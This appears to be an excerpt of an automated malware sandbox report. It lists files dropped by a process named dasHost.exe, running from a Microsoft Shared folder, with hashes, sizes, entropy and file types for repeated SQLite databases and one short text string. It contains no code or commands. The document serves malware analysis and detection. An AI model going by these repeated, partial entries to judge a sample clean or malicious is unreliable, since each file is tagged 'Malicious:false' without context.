                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):4.453660689688184
                                                                        Encrypted:false
                                                                        SSDEEP:3:1V/Wn:PWn
                                                                        MD5:E57858FF96F3A6A89C77B8C04CBA9B39
                                                                        SHA1:EF68063BA36A2016BF0EC8ACD768D6D59CA163D1
                                                                        SHA-256:F386DD76FBC6D37E5D5F94A3E2B140FC716A0453441FB5228501532A974CB555
                                                                        SHA-512:AC9E416B1A8CA5898A956B86CDDEF6E452AEBE5FE6105268D09B11F17ECBE70672B432F100A7C60AC9C07D087DAC72447627835407E1AD66BACB71FAAAEB695E
                                                                        Malicious:false
                                                                        Preview:knQrJokH7udsF90i2kmgxGvIy
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
